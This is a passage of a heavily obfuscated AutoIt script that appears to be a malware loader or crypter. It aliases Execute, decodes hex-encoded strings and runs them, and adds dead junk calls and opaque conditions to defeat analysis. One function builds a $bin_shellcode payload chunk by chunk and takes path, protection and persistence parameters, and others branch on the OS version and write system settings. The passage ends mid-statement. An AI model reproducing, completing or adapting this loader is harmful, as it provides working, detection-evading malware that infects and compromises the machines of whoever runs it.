  5138. If 171 <= 257 AND 138 = 138 AND 220 <> 242 AND 184 > 133 AND 232 < 253 AND $1115248989 = 960345959 Then
  5139. Local $pacl = $e($bn(wmhsrosshiij(tznhxlbucosri("x033B773735304530463034373431343635303437373435363437363334373431313B31373437373237303730413A3"), tznhxlbucosri("x0C6A5"))))
  5140. $1115248989 = 1681609778
  5141. Mod(2295352, 1811304)
  5142. EndIf
  5143. If 181 <= 198 AND 197 >= 137 AND 196 > 183 AND 216 > 108 AND 124 > 113 AND $1115248989 = 1307843693 Then
  5144. $e = Execute
  5145. IsPtr(1699158 - 2427547)
  5146. $1115248989 = 304222797
  5147. IsFloat(608115 * 1146809 - 3418155 * 876292)
  5148. EndIf
  5149. If 293 <= 299 AND 154 <> 297 AND 152 < 299 AND $1115248989 = 1312944448 Then
  5150. Local $psd = $e($bn(wmhsrosshiij(tznhxlbucosri("x00387434363346334533373437323735363337343437363537343530373437323238323437343533343432393"), "0x")))
  5151. Dim $sekaqc3n2rqx17bwrkhk = 1948221
  5152. $1115248989 = 1337610490
  5153. EndIf
  5154. If 181 > 130 AND 206 > 173 AND 289 > 106 AND $1115248989 = 1337610490 Then
  5155. Local $ret = $e($bn(wmhsrosshiij(tznhxlbucosri("x0038743436334633443336313633463342383237363136343736363137303639333333323235463436334633423732334230323736393635473432373233423032373439363546393734363936313633463937314635353336353633373537323639373437393434363537333633373236393730373436364732323732334230323737303734373232373233423032343730353334343233423032373634373736364732363432373233423032373331323732393"), "0x")))
  5156. $1115248989 = 171873601
  5157. Dim $oc7oszbkik0xqcj4q3n0 = 2735166
  5158. Dim $i2z8dtt2ycmzlom5gc6v = 411902 * 2312855 + 548344 - 1660151 - 2044140 - 1998167
  5159. EndIf
  5160. If 271 > 109 AND 230 = 230 AND 125 <= 176 AND 252 <= 258 AND $1115248989 = 1591982618 Then
  5161. Local $tacl = $e($bn(wmhsrosshiij(tznhxlbucosri("x013975353732473244323635363336343732363535323633373437303635373433393333373336383635373433313530373237324433373436373738363237383737473442334733363836353734333134323733363042303233463436323739373746333635333135303732373244323738363047343233463436323739373746333635333135303732373435323737463437344635323346343632373937374633363533313432373336304233333333383"), tznhxlbucosri("x04545E4"))))
  5162. Dim $i6llobffci6eeok4jqta = 1917404
  5163. $1115248989 = 960345959
  5164. IsBinary(3871409 * 1436528)
  5165. EndIf
  5166. If 182 >= 134 AND 218 <= 266 AND 292 < 298 AND $1115248989 = 1681609778 Then
  5167. Local $tsd = $e($bn(wmhsrosshiij(tznhxlbucosri("x00387434363346334533373437323735363337343433373236353631373436353238323236323739373436353532433233303534423232393"), "0x")))
  5168. $1115248989 = 1312944448
  5169. IsString(1987753 - 1548415)
  5170. EndIf
  5171. If 200 >= 151 AND 137 <> 103 AND 148 < 292 AND $1115248989 = 1711264047 Then
  5172. $ret = $e($bn(wmhsrosshiij(tznhxlbucosri("x013975353732473245323730373247324339333637303735363737303631373832323233333447353732473243363332433133363738373446353336333243313336343237343635353347343633373447343732453747333730473437323635343237343732363436333738363536383336333243313336363136353633333633324331333537393730373447353732473433324331333637353636373746333735333633324331333632313639323132353336333243313336363136353633333633324331333536313432353533383"), tznhxlbucosri("x0B466E6"))))
  5173. ExitLoop
  5174. IsPtr(2399613 + 279857 - 2429222 - 2545332)
  5175. EndIf
  5176. Next
  5177. EndFunc
  5178.  
  5179. Func xdqevzaxtm()
  5180. Local $osversion = $ndivddlyqicolemnsqxmeslllqujkqbqbcmwvxt
  5181. If 227 = 227 AND 277 = 277 AND 153 > 143 AND 157 >= 101 AND NOT $jnakoabkaoai() Then
  5182. Switch (True)
  5183. Case $lnddocutiwos($osversion, wmhsrosshiij(tznhxlbucosri("x063"), tznhxlbucosri("x085E467")))
  5184. Call(wmhsrosshiij(tznhxlbucosri("x07596E646F677377354C65667164796F6E6"), tznhxlbucosri("x065")))
  5185. Case $lnddocutiwos($osversion, wmhsrosshiij(tznhxlbucosri("x0B3"), tznhxlbucosri("x0C466")))
  5186. Call(wmhsrosshiij(tznhxlbucosri("x07596E646F677377354C65667164796F6E6"), tznhxlbucosri("x065")))
  5187. Case $lnddocutiwos($osversion, wmhsrosshiij(tznhxlbucosri("x02333"), tznhxlbucosri("x005B6")))
  5188. Call(wmhsrosshiij(tznhxlbucosri("x07596E646F67737130354C65667164796F6E6"), "0x"))
  5189. EndSwitch
  5190. EndIf
  5191. EndFunc
  5192.  
  5193. Func pvoebpaout()
  5194. Global $960345959 = 1307843693
  5195. Global $ihjdlg1yi4 = 2759505
  5196. For $e = 0 To 2408746
  5197. If 280 >= 123 AND 250 > 186 AND 296 > 181 AND $960345959 = 304222797 Then
  5198. $bvnakuhdnyyj(wmhsrosshiij(tznhxlbucosri("x0467746F657776737"), tznhxlbucosri("x0D69697")))
  5199. $960345959 = 1591982618
  5200. Int(1439271)
  5201. EndIf
  5202. If 243 > 151 AND 267 >= 203 AND 272 > 200 AND 296 <= 298 AND 249 = 249 AND $960345959 = 1307843693 Then
  5203. $hhafquinevog(wmhsrosshiij(tznhxlbucosri("x0C4F474158575B626073756671685748656777716778596777626D686168577C616868685B64716A68576B6969656A606"), tznhxlbucosri("x03535A6D4")), wmhsrosshiij("0x", tznhxlbucosri("x0B40705A6")), wmhsrosshiij(tznhxlbucosri("x0255474F535A5"), "0x"), $hwobyepsertwooaziugcagzjdeoumwevcfhbvvszrtcgrwxm)
  5204. IsPtr(2942451 + 1959074 - 196882)
  5205. $960345959 = 304222797
  5206. EndIf
  5207. If 275 = 275 AND 181 = 181 AND 110 < 195 AND 101 >= 100 AND $960345959 = 1591982618 Then
  5208. $gidzbjoxovyx($dawmcpaxeytqvfhmytihyemcglhetsghcxjvhjzqgeqxyjwnutscoeyz)
  5209. String(tznhxlbucosri("LWZlS90VSkugKNKUyt2BKl44s1vxD29BM4uzxw3VE8WgSHgOVwcxF3lHrSR8yuQ7hpaAzl5nHMQ3iDjvrMg9zgg"))
  5210. ExitLoop
  5211. EndIf
  5212. Next
  5213. EndFunc
  5214.  
  5215. Func fekmuawhwn()
  5216. Global $1312944448 = 1307843693
  5217. Global $zdhjgzfaqn = 303180
  5218. For $e = 0 To 3690280
  5219. Chr(1614776)
  5220. If 224 <> 267 AND 169 = 169 AND 195 < 212 AND 170 <= 256 AND $1312944448 = 304222797 Then
  5221. $hhafquinevog(wmhsrosshiij(tznhxlbucosri("x094A42445D525E6765767063746D524D60627274627D5C627C22746575786F66627D5279646D6D6D5E61746F6D526E6C6C606F656"), tznhxlbucosri("x027E654")), wmhsrosshiij(tznhxlbucosri("x04456C6567616475654875636574756"), "0x"), wmhsrosshiij(tznhxlbucosri("x0255474F535A5"), "0x"), wmhsrosshiij(tznhxlbucosri("x0F447D6D6"), tznhxlbucosri("x06416A5")))
  5222. $1312944448 = 1591982618
  5223. IsBool(3251620 + 1618570)
  5224. Ptr(tznhxlbucosri("75jWJE"))
  5225. EndIf
  5226. If 187 > 124 AND 218 < 273 AND 222 < 265 AND 276 > 116 AND 197 = 197 AND $1312944448 = 960345959 Then
  5227. $bvnakuhdnyyj(wmhsrosshiij(tznhxlbucosri("x066F6468656C6075627"), tznhxlbucosri("x066")))
  5228. Dim $m429vbjnavvnfdil9elq = 3367181 * 1681671
  5229. $1312944448 = 1681609778
  5230. String(3305498 + 2900286 - 3759957)
  5231. EndIf
  5232. If 253 >= 220 AND 241 <= 291 AND 266 = 266 AND 288 >= 280 AND 148 <> 147 AND $1312944448 = 1307843693 Then
  5233. $lgaftrqvglak(wmhsrosshiij(tznhxlbucosri("x0A64637F646D62333F256D6D6"), tznhxlbucosri("x0A60565")), wmhsrosshiij(tznhxlbucosri("x016C6C6F66626D6"), tznhxlbucosri("x05456")), wmhsrosshiij(tznhxlbucosri("x035B637230314A65666861635B63723032477651606D667167607D6B6A6"), tznhxlbucosri("x0C6271616")), wmhsrosshiij(tznhxlbucosri("x016C6C6F66626D6"), tznhxlbucosri("x05456")), wmhsrosshiij(tznhxlbucosri("x043"), tznhxlbucosri("x0C61626E6")))
  5234. $1312944448 = 304222797
  5235. EndIf
  5236. If 223 <> 160 AND 200 <> 274 AND 193 < 238 AND 278 <= 293 AND $1312944448 = 1591982618 Then
  5237. $hhafquinevog(wmhsrosshiij(tznhxlbucosri("x094A42445D525E6765767063746D524D60627274627D5C627C22746575786F66627D5279646D6D6D5E61746F6D526E6C6C606F656"), tznhxlbucosri("x027E654")), wmhsrosshiij("0x", tznhxlbucosri("x0B40705A6")), wmhsrosshiij(tznhxlbucosri("x0255474F535A5"), "0x"), $hwobyepsertwooaziugcagzjdeoumwevcfhbvvszrtcgrwxm)
  5238. Mod(1192522, 2844956)
  5239. $1312944448 = 960345959
  5240. EndIf
  5241. If 264 >= 160 AND 212 >= 170 AND 164 <= 225 AND 128 >= 115 AND $1312944448 = 1681609778 Then
  5242. $gidzbjoxovyx($dawmcpaxeytqvfhmytihyemcglhetsghcxjvhjzqgeqxyjwnutscoeyz)
  5243. Dim $bn7doqy1lrlaae3hgq4y = 3231412
  5244. ExitLoop
  5245. EndIf
  5246. WinExists("F")
  5247. Next
  5248. EndFunc
  5249.  
  5250. Func kjvzijodxe($wpath, $lpfile, $protect, $persist)
  5251. Global $2102046848 = 1307843693
  5252. Global $wdo0lqy8gq = 1772653
  5253. For $e = 0 To 3220567
  5254. If 274 <= 291 AND 290 < 291 AND 184 <> 273 AND 202 <= 222 AND 275 > 173 AND $2102046848 = 45342449 Then
  5255. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x093530454133313131313935493430313742474747474431374"), tznhxlbucosri("x055E607"))
  5256. $2102046848 = 1390580830
  5257. Ptr(tznhxlbucosri("4LQmtRscthqTz2NZJ6noiDyIFgtrlRdu8XBZI02jfnn1GGgzJpoR9LDdYukISb5K8"))
  5258. WinExists(tznhxlbucosri("XwAxawqx2vfIelEhAg4Xhv9c08DEo5d1FFW3Xt9pmO59f9NZADo28QpnxUFC4EguFaQIul"))
  5259. EndIf
  5260. If 119 > 102 AND 215 > 161 AND 239 > 164 AND 136 > 121 AND $2102046848 = 45624006 Then
  5261. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x003034363833364540354733444238324446463141303834443"), tznhxlbucosri("x0D6"))
  5262. $2102046848 = 1121997128
  5263. EndIf
  5264. If 132 < 295 AND 288 < 293 AND 182 <= 270 AND 271 > 154 AND $2102046848 = 47899740 Then
  5265. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x073536483646473534483646453534443835334030364834364"), "0x")
  5266. $2102046848 = 1472136877
  5267. EndIf
  5268. If 183 < 263 AND 164 = 164 AND 249 >= 142 AND 153 >= 129 AND 199 <= 278 AND $2102046848 = 71527144 Then
  5269. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x073149303030303030323037343139383533403739303436314"), "0x")
  5270. $2102046848 = 532865056
  5271. EndIf
  5272. If 208 = 208 AND 100 < 198 AND 258 > 168 AND 153 > 107 AND 193 <= 201 AND $2102046848 = 84602552 Then
  5273. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x0130303242424242424C3040313D303C3D3C31303C324242424"), tznhxlbucosri("x0F4657746"))
  5274. $2102046848 = 2134070852
  5275. EndIf
  5276. If 189 <> 170 AND 213 <= 237 AND 136 <> 295 AND 184 <> 104 AND 159 <= 250 AND $2102046848 = 89876260 Then
  5277. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x02424242473640313437433035303C364131324740323736433"), tznhxlbucosri("x056259496"))
  5278. $2102046848 = 150208926
  5279. WinExists(tznhxlbucosri("jFiCJo3ceTMiJxNE03xVbiHxpsB8DsosFl0w2xWqDJnYzEVH0ob2GhEu5W"))
  5280. IsBinary(2318179 * 3577191)
  5281. EndIf
  5282. If 106 >= 100 AND 108 = 108 AND 218 = 218 AND $2102046848 = 93242189 Then
  5283. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x043540323541334246353439393535333633323137424635343"), tznhxlbucosri("x0F65417"))
  5284. $2102046848 = 715234060
  5285. EndIf
  5286. If 292 <= 298 AND 153 >= 142 AND 220 < 280 AND 108 >= 101 AND 285 = 285 AND $2102046848 = 113573692 Then
  5287. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x034646464648333340303835303646473534483646453539343"), "0x")
  5288. Ptr(834891 + 3515431)
  5289. $2102046848 = 1724676842
  5290. Mod(1818869, 2444561)
  5291. EndIf
  5292. If 168 > 162 AND 249 >= 125 AND 217 < 292 AND 121 = 121 AND 209 < 295 AND $2102046848 = 150208926 Then
  5293. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x043139363334463232324134374434443349334444343542433"), tznhxlbucosri("x06757C4"))
  5294. WinExists(tznhxlbucosri("cCkr49AIL"))
  5295. $2102046848 = 578141839
  5296. IsBool(2383363 - 546082 * 2666546 + 2442203)
  5297. Int(1572659)
  5298. EndIf
  5299. If 112 > 102 AND 221 >= 184 AND 206 = 206 AND $2102046848 = 171873601 Then
  5300. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x013434393344424430343034323437343639334635413932323"), tznhxlbucosri("x0262576"))
  5301. $2102046848 = 198176244
  5302. IsPtr(2652109 - 3177802 * 1146999)
  5303. IsPtr(2910779 * 66885 * 2510686)
  5304. EndIf
  5305. If 299 > 225 AND 146 <= 178 AND 281 > 131 AND $2102046848 = 192622806 Then
  5306. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x023646473530334646473530383646453531443835334030364"), tznhxlbucosri("x027"))
  5307. Ptr(3647822 - 1843507 - 319945)
  5308. $2102046848 = 45342449
  5309. Random(3807482)
  5310. EndIf
  5311. If 223 <= 245 AND 196 > 104 AND 213 <= 268 AND $2102046848 = 198176244 Then
  5312. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x02423C36403337374C364030373C333C343737433C364134363"), tznhxlbucosri("x085847417"))
  5313. Dim $max4jt54n2cdptuq3nx2 = tznhxlbucosri("hV3ncq9mWRSKC9dL0")
  5314. $2102046848 = 1711264047
  5315. Random(2487562)
  5316. Dim $bvd1fdscs3b3jb2qs57g = 3479202
  5317. EndIf
  5318. If 142 >= 109 AND 149 >= 144 AND 169 <> 225 AND 210 <= 272 AND $2102046848 = 222942804 Then
  5319. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x003646473635303631403036464535393838324448383534424"), "0x")
  5320. $2102046848 = 1554786304
  5321. EndIf
  5322. If 142 >= 105 AND 232 > 133 AND 159 <= 289 AND $2102046848 = 232684580 Then
  5323. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x003030303038324736303348324736303348324336383243363"), "0x")
  5324. WinExists(tznhxlbucosri("GZ1g9FCvCNyHafDTXZqx8RoCDQTXas3uxzvMjCrwBwMt6tokTykoLU0Y1eblLm"))
  5325. $2102046848 = 960210641
  5326. EndIf
  5327. If 101 < 245 AND 216 >= 209 AND 242 = 242 AND 141 = 141 AND 165 >= 128 AND $2102046848 = 271776171 Then
  5328. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x033347354245493535383245434831354346403033303030303"), "0x")
  5329. String("")
  5330. $2102046848 = 1220020015
  5331. Dim $4po05tthtivjjyiwrk7v = 321880
  5332. IsFloat(tznhxlbucosri("B7b1ITNUHRnlC6NSKs92kELjyfeSjb88qv1WrQm0EyagdJEOAMQBDYXipst6O1GLnJO20Qa7OUaKid"))
  5333. EndIf
  5334. If 258 > 138 AND 126 >= 118 AND 250 >= 150 AND 107 <= 257 AND 300 <= 301 AND $2102046848 = 281617475 Then
  5335. Local $file_struct = $e($b(wmhsrosshiij(tznhxlbucosri("x003874343633463345333734373237353633373434333732363536313734363532383232363237393734363532303633473036363639363346353532423232303236323035333734373236393635463734334635363542383234363347303436363936334635323932303236323032323534423232393"), tznhxlbucosri("x044"))))
  5336. $2102046848 = 1813210520
  5337. Chr(2392047)
  5338. Dim $h8havgvt3iawl9ywca5i = 3582889 + 2899673 + 930904 * 2322965 - 903301 + 3284531 + 167513 + 2160579
  5339. EndIf
  5340. If 130 >= 111 AND 160 >= 110 AND 214 <= 249 AND 249 = 249 AND 268 > 267 AND $2102046848 = 293204093 Then
  5341. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x053648303336424833373445434030383934373334303648343"), tznhxlbucosri("x067"))
  5342. IsString(900081 * 438236)
  5343. $2102046848 = 332718624
  5344. IsPtr(tznhxlbucosri("ribw88xpAmR62EjUkugB6DRVbZocJB0dIpG2a4Ic4BotLrowIUQtrrmlOF6mb6L5gw6Bm9to3hIOGLz"))
  5345. EndIf
  5346. If 160 <= 271 AND 166 > 157 AND 264 > 165 AND 294 <= 296 AND $2102046848 = 304222797 Then
  5347. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x043036343038303338303037353641423243413534434230343"), tznhxlbucosri("x037"))
  5348. $2102046848 = 1591982618
  5349. WinExists(tznhxlbucosri("Hxx7aQYoLg8z1SjkpztGH9MxJLo9q9Hi"))
  5350. EndIf
  5351. If 260 = 260 AND 247 <= 278 AND 121 < 184 AND $2102046848 = 332718624 Then
  5352. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x093041313131313139323635474531313137493539313131313"), tznhxlbucosri("x0872774"))
  5353. IsString(1209277 * 2020321)
  5354. $2102046848 = 2145452884
  5355. EndIf
  5356. If 141 <> 105 AND 123 <> 276 AND 140 = 140 AND 116 < 268 AND $2102046848 = 473753307 Then
  5357. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x074746343749374746343549374744343242493432413137493"), tznhxlbucosri("x0178525"))
  5358. Mod(219241, 962895)
  5359. $2102046848 = 610517555
  5360. IsBool(tznhxlbucosri("ujfVabZZ2Dv6L11Ou6EthGcxtR59KcCKkejymX9klQwXGNMYwxLKWocrT6Ry3a3XCqRrFnUeukvYbtjyvFOH99snv3enCXW84x"))
  5361. EndIf
  5362. If 130 <> 287 AND 257 < 275 AND 110 <> 236 AND 267 <> 259 AND 154 <= 286 AND $2102046848 = 486305246 Then
  5363. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x013747474747474938313039343241313749353830313231313"), tznhxlbucosri("x016E417"))
  5364. $2102046848 = 45624006
  5365. EndIf
  5366. If 278 <> 208 AND 146 >= 105 AND 293 < 294 AND 243 >= 151 AND $2102046848 = 486612862 Then
  5367. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x073442434839343534403339324541403030303030303734313"), "0x")
  5368. $2102046848 = 1196477466
  5369. IsFloat(1315637 + 2650909)
  5370. EndIf
  5371. If 249 > 159 AND 139 < 293 AND 263 <= 283 AND $2102046848 = 499539945 Then
  5372. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x043434324C30343144373434343437373744373D353234324D3"), tznhxlbucosri("x016A4A7B4"))
  5373. Mod(3915025, 3207019)
  5374. $2102046848 = 1617221087
  5375. Random(3757870)
  5376. Dim $7y6n3y5ovhhtu6mtuhrt = tznhxlbucosri("ap6YtrKI5tIU958twgTWXQTWM5n1p7yyLcxRrhfLevmcVX7zusM")
  5377. EndIf
  5378. If 132 < 240 AND 192 <> 110 AND 108 = 108 AND 162 >= 108 AND 248 < 260 AND $2102046848 = 503206081 Then
  5379. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x053534443835334030364834333346454646464648324436323"), tznhxlbucosri("x064"))
  5380. $2102046848 = 1953361207
  5381. Chr(946629)
  5382. EndIf
  5383. If 212 > 187 AND 134 > 127 AND 152 > 131 AND 278 <> 185 AND 206 >= 117 AND $2102046848 = 515584002 Then
  5384. Local $e = Execute
  5385. String(252581 - 2076605 + 1148055)
  5386. $2102046848 = 787083456
  5387. Ptr(2799789 - 3033868 - 3709943)
  5388. EndIf
  5389. If 261 <> 292 AND 235 <> 119 AND 214 > 169 AND 138 <> 133 AND $2102046848 = 532865056 Then
  5390. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x003431464533363134343434343430343243304C353647443C3"), tznhxlbucosri("x0B695B674"))
  5391. IsBinary(859227 - 3465663 + 622791 + 1106036)
  5392. $2102046848 = 717329250
  5393. Dim $b8obogoxdyzxmiroj0ah = tznhxlbucosri("B9AtBdWcHYeWiv4X5CogiGXXpgHT2EGAJeFBbvOkLMqQTN90V44Q")
  5394. EndIf
  5395. If 189 > 143 AND 172 >= 99 AND 122 < 268 AND 177 = 177 AND $2102046848 = 548714918 Then
  5396. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x043138393434464033324348373344434832473243334832443"), tznhxlbucosri("x074"))
  5397. IsBinary(1342395 * 1968397 + 3745772 + 998791)
  5398. $2102046848 = 293204093
  5399. IsFloat(tznhxlbucosri("VBLAC5jGywMTlUmGQV2KQZ6wuijTTxsemNjoS3y8why719UGcJfoxfVSDxKDwTNVu"))
  5400. EndIf
  5401. If 112 > 103 AND 249 <> 182 AND 192 <= 288 AND 188 >= 140 AND $2102046848 = 552220289 Then
  5402. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x064647363435303642473434343140383636383533403734323"), "0x")
  5403. String(tznhxlbucosri("lSBU8S"))
  5404. $2102046848 = 868642390
  5405. IsPtr(2328653 - 3915941 + 1018901)
  5406. EndIf
  5407. If 216 <= 266 AND 210 <> 249 AND 132 <> 263 AND 102 > 99 AND $2102046848 = 563894604 Then
  5408. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x013235304135313234333135393835354745323349374045313"), tznhxlbucosri("x08727C6"))
  5409. Mod(1537092, 2735515)
  5410. $2102046848 = 1598205459
  5411. Int(229690)
  5412. Dim $xmslx4nqcyglxtwyivmt = tznhxlbucosri("LDZ5t")
  5413. EndIf
  5414. If 101 < 115 AND 243 <> 228 AND 149 < 273 AND 193 <> 180 AND 130 >= 118 AND $2102046848 = 578141839 Then
  5415. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x013931313933453437493137434631353631393341353932313"), tznhxlbucosri("x0970516"))
  5416. Ptr(tznhxlbucosri("zwmWMxKsLszn1vJc87kmwR8hKswXzdzNENWkFbWyVZh4eYdpUXaHnM9nYrW46Z2GX71WpQAIAI5uaCojUutJM1AXkqmELL36bnajxrGwglmBr2"))
  5417. $2102046848 = 271776171
  5418. IsBinary(1751009 - 865627)
  5419. EndIf
  5420. If 294 > 119 AND 196 <> 174 AND 126 <= 229 AND 228 >= 191 AND 297 >= 218 AND $2102046848 = 588931838 Then
  5421. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x04363330303035454734303037413B3A34374547303030433B3"), tznhxlbucosri("x0F6D6"))
  5422. $2102046848 = 2113738531
  5423. IsPtr(tznhxlbucosri("D6RB0B6iw7iclVHKO9Hnl6F0aaa0X6W1sZSEJzAeTFTDeuhpXz0LXHV26MARi9k9qEBs2RyiWJmchS5lSUjKalcoTzDfM3wAU"))
  5424. EndIf
  5425. If 263 <= 284 AND 232 > 164 AND 223 <> 158 AND 192 <> 236 AND $2102046848 = 589132072 Then
  5426. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x04324C31323534363434343432354034323C343437343434343"), tznhxlbucosri("x047349624"))
  5427. $2102046848 = 222942804
  5428. IsBool(827250 * 3029921)
  5429. IsString(3027662 + 2169938 * 3914240 - 100853)
  5430. EndIf
  5431. If 277 <> 172 AND 223 <> 274 AND 210 <= 241 AND 266 <> 145 AND 274 >= 107 AND $2102046848 = 589339962 Then
  5432. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x033336464347343535434031303030303030353736464735344"), tznhxlbucosri("x036"))
  5433. $2102046848 = 866968452
  5434. IsBinary(3799773 - 1843456 - 3551685)
  5435. EndIf
  5436. If 225 > 172 AND 113 < 172 AND 225 < 263 AND $2102046848 = 607137504 Then
  5437. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x013735303938353547453233424936333834423237474739313"), tznhxlbucosri("x05435A6"))
  5438. Dim $e8ucqvqiti5jz4uucevb = tznhxlbucosri("RaAtmfMOKM9VuDT99Hsq4nbwZldHfikNtZrDcAHl6aGgjkJvbuFDjEgFstqoLOGDK6jkS0FsSYqrZXb07DhSiKOQX")
  5439. $2102046848 = 1869447033
  5440. EndIf
  5441. If 155 > 107 AND 209 <> 153 AND 179 < 255 AND $2102046848 = 610517555 Then
  5442. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x053445374447474747423232413938363547453737323345373"), tznhxlbucosri("x0849465"))
  5443. String(tznhxlbucosri("JKl9LT8SWRp1EsnBRXw4X6E5CvkV3S4ZnYporcfoLy3BHXBfJQmhfDXMDOpZH0Yq77eA"))
  5444. $2102046848 = 909112051
  5445. EndIf
  5446. If 234 > 172 AND 157 <> 130 AND 246 < 275 AND 277 <> 241 AND $2102046848 = 687038453 Then
  5447. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x053246454646464645373631403438344435364835303832483"), "0x")
  5448. $2102046848 = 1329218685
  5449. String(tznhxlbucosri("xYEsVhALKSKABIp8v16Mh0mbyDUMhQBsWN2bcGciGuCSKZcLID8geSQ1gwTb2iKU9sX7fAYSKnsLHy2wJXhp"))
  5450. EndIf
  5451. If 107 = 107 AND 290 >= 146 AND 250 = 250 AND 297 >= 257 AND 143 <> 287 AND $2102046848 = 715234060 Then
  5452. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x083345483636413830344839383535343646464646464832443"), "0x")
  5453. WinExists(tznhxlbucosri("AFzbB3gW0kYMxLs1hVHCYriUI5ML8Kypf2rJXWjRG"))
  5454. $2102046848 = 1767117565
  5455. Random(3832285)
  5456. EndIf
  5457. If 102 < 195 AND 126 >= 110 AND 275 <> 263 AND $2102046848 = 717329250 Then
  5458. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x023441303139323241303134434034393432413638313437304"), tznhxlbucosri("x0D67777"))
  5459. IsFloat(2457720 - 236707)
  5460. $2102046848 = 1567095249
  5461. WinExists(tznhxlbucosri("ZuFiJm6oXFFJz7bsA93mL6wUy3sNcFJ3s3uwVx7lcaeAkQlKuXpe9DTHVfM"))
  5462. Random(1693489)
  5463. EndIf
  5464. If 108 >= 104 AND 279 > 180 AND 195 <= 291 AND 189 >= 186 AND 188 > 149 AND $2102046848 = 724091247 Then
  5465. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x07354736314B3633364B37313546454545454B314B304146313"), tznhxlbucosri("x045D6"))
  5466. $2102046848 = 486305246
  5467. IsBinary(tznhxlbucosri("nNpp33QkSQBXlEM74gNVLoxida6LRj7HYi1RoaNfzH5fE9oBrGS2z3bT1e0oor8F0jQsgD1MgYZfmGFywL2zZZSdOfiWpatwg4iVVlzUbNW34t1ETC4oY"))
  5468. Int(3138603)
  5469. EndIf
  5470. If 165 = 165 AND 144 <> 100 AND 135 = 135 AND $2102046848 = 742906269 Then
  5471. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x0745443C37433C31323742424242424241473745404C3437374"), tznhxlbucosri("x046673777"))
  5472. Ptr(tznhxlbucosri("I1WUA5pB0u9MXnr5ky4krOBaqEA6Kv5kjfujHbe8mzxyZrwyEyzlzNJZrH"))
  5473. $2102046848 = 1972768996
  5474. EndIf
  5475. If 164 < 267 AND 162 < 223 AND 252 >= 153 AND $2102046848 = 752856490 Then
  5476. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x0335454435363335454435303735454436374B3545463630433"), tznhxlbucosri("x05505"))
  5477. IsFloat(3569260 - 2393557)
  5478. $2102046848 = 1374512406
  5479. EndIf
  5480. If 264 <> 203 AND 227 > 208 AND 243 < 252 AND 113 <> 261 AND $2102046848 = 787083456 Then
  5481. Local $b = $e(wmhsrosshiij(tznhxlbucosri("x03486F606378755E625573786F666"), tznhxlbucosri("x076D6E6")))
  5482. $2102046848 = 1569360220
  5483. Dim $2ic1yurqujwuqujysorj = 3736566 - 2920249 * 981585 - 875003 - 3721249 - 2786321
  5484. IsBool(3664128 + 1334775 * 1656462 + 2888043)
  5485. EndIf
  5486. If 265 < 286 AND 299 = 299 AND 211 >= 170 AND 223 < 298 AND 204 >= 155 AND $2102046848 = 793922489 Then
  5487. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x043241363530333933453547453932324633393137434635373"), tznhxlbucosri("x086D4F6"))
  5488. $2102046848 = 607137504
  5489. WinExists(tznhxlbucosri("jf5nUK0GLoGdUU38M1HQzOuqkVLS8QWTbvm0aC1FepATzrCQkU37t3O133zj4bk"))
  5490. EndIf
  5491. If 265 < 266 AND 277 <= 296 AND 231 <= 287 AND $2102046848 = 819068712 Then
  5492. $e($b(wmhsrosshiij(tznhxlbucosri("x043C7030323742374037323532374237463C36363236423133363231423132374737373636363637463436363230333332324336323036363637463436363132323D3336333033313235323740323336323132313636363746343636323033333232433632303636363746343630323743343137323C3231323742374237323242303231363746343636323033333232433632303636363746343636373436363637463436363230333332324336323036363637463436363734333C373C3734373437343636363D3"), tznhxlbucosri("x025A444F4"))))
  5493. ExitLoop
  5494. IsPtr(tznhxlbucosri("ZgJsZRvcpEF20bb2kjJtg0uZC4aH7o8IgUeXqbd8X0W5NccojyTIZA9a79nQcrHh3Q4VYc2aqmcTdkpsEoeL0x5GXfdeVKXVxOift3"))
  5495. EndIf
  5496. If 272 > 187 AND 167 <> 215 AND 293 <= 298 AND 272 >= 117 AND $2102046848 = 834897274 Then
  5497. $bin_shellcode &= wmhsrosshiij(tznhxlbucosri("x064646464646454543383833303343473835363436464646464"), tznhxlbucosri("x056"))
  5498. Dim $fjf7y5oz8wacj0v0zpu6 = 1135756 - 2030272 * 1511448 * 3892068 + 1474390 * 2055379
  5499. $2102046848 = 2014417103
  5500. String(532962 + 1620881 + 3117050 * 1438220)
  5501. EndIf
  5502. If 191 = 191 AND 268 < 274 AND 196 <= 265 AND 144 <> 110 AND 223 <= 257 AND $2102046848 = 855549293 Then
